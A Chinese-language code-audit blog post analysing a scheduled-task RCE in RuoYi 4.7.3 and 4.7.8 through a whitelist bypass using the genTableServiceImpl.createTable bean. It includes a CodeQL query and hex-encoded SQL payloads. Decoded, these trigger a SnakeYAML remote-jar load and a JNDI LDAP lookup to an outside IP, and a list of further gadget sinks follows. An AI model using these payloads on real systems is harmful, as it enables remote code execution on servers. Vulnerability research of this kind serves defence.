【代码审计】RuoYi-4.7.3&4.7.8 定时任务RCE 漏洞分析

Z3r4y2025-11-14 1:02

目录

4.7.3

4.7.8

4.7.3

关注/monitor/job/add

做了黑名单和白名单

看一下定时任务是怎么执行的

在getDeclaredMethod获取方法后,并没有执行setAccessible(true),所以只能拿public方法

再看下isValidClassName的实现

其实就是,若非全限定类名,则从spring容器中取出对象;若是全限定类名,则利用反射调用无参构造函数方法创建对象

此逻辑在白名单处也有,代码仅仅对全限定类名(class)进行了检测,但没有对spring容器中的对象进行白名单检测。

则思路为,在spring容器中找到一个不在黑名单中的Bean

或者在白名单内找一个不在黑名单且符合要求的类

交给codeql跑一下

复制代码 
codeql database create ruoyi-database --language=java --command='mvn clean package -f "pom.xml"'

import java

from Method m

where
    m.getDeclaringType().getAConstructor().hasNoParameters() 
    m.isPublic()
    and m.getAParamType() instanceof TypeString
    and m.getDeclaringType().getPackage().getName().matches("com.ruoyi%")
    and not m.isAbstract()
    and not m.getDeclaringType().getPackage().getName().matches("com.ruoyi.common.utils.file%")
    and not m.getName().matches("get%")
    and not m.getName().matches("is%")
    and not m.getName().matches("has%")

select m.getDeclaringType().getPackage().getName(),m.getDeclaringType(),m

关注到com.ruoyi.generator.service.impl.GenTableServiceImpl#createTable

搜一下xml

可任意sql语句执行

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 1;')

这样就绕过了新建任务的Waf限制,可通过直接修改数据库来修改计划任务的内容

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6f72672e79616d6c2e736e616b6579616d6c2e59616d6c2e6c6f6164282721216a617661782e7363726970742e536372697074456e67696e654d616e61676572205b21216a6176612e6e65742e55524c436c6173734c6f61646572205b5b21216a6176612e6e65742e55524c205b22687474703a2f2f382e3133382e33382e38313a313333382f79616d6c2d7061796c6f61642e6a6172225d5d5d5d2729 WHERE job_id = 1;')

成功修改

弹出计算器

4.7.8

和4.7.3最大的区别在于白名单的处理逻辑

当调用Spring Bean的时候也要走一下白名单和黑名单

com.ruoyi.generator.service.impl.GenTableServiceImpl依然能过该版本的黑白名单

但在4.7.9版本被修了(

接着打就行,但换种打法

javax.naming.InitialContext#lookup

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f382e3133382e33382e38313a313333382f237375696269616e2729 WHERE job_id = 1;')

成功修改

其他也都可以,不一一赘述了

javax.naming.InitialContext#lookup

org.yaml.snakeyaml.Yaml#load

org.springframework.jndi.JndiLocatorDelegate#lookup

org.springframework.jdbc.datasource.lookup.JndiDataSourceLookup#getDataSource

org.apache.velocity.runtime.RuntimeInstance#init

相关推荐
xing-xing11 小时前
JVM 内存、直接内存、系统内存、本地内存、物理内存总结
java·jvm
yangpipi-11 小时前
《C++并发编程实战》第5章 C++内存模型和原子操作
android·java·c++
qq_124987075312 小时前
基于微信小程序的电子元器件商城(源码+论文+部署+安装)
java·spring boot·spring·微信小程序·小程序·毕业设计
吃喝不愁霸王餐APP开发者12 小时前
基于Spring Cloud Gateway实现对外卖API请求的统一鉴权与流量染色
java·开发语言
a努力。12 小时前
美团Java面试被问:Redis集群模式的工作原理
java·redis·后端·面试
一雨方知深秋13 小时前
面向对象编程
java·封装·this·构造器·static关键字·成员变量·javabean实体类
资生算法程序员_畅想家_剑魔13 小时前
Java常见技术分享-11-责任链模式
java·spring boot·责任链模式
计算机程序设计小李同学13 小时前
动漫之家系统设计与实现
java·spring boot·后端·web安全
程序员阿鹏13 小时前
责任链模式
java·spring·servlet·tomcat·maven·责任链模式
@淡 定14 小时前
Java内存模型(JMM)详解
java·开发语言
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03UV安装并设置国内源04Linux下V2Ray安装配置指南05Gemini3 生成的基于手势控制3D粒子圣诞树06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题08Labelme从安装到标注:零基础完整指南09GLM-4.7 vs MiniMax-M2.1:代码工程理解10CentOS的ISO镜像下载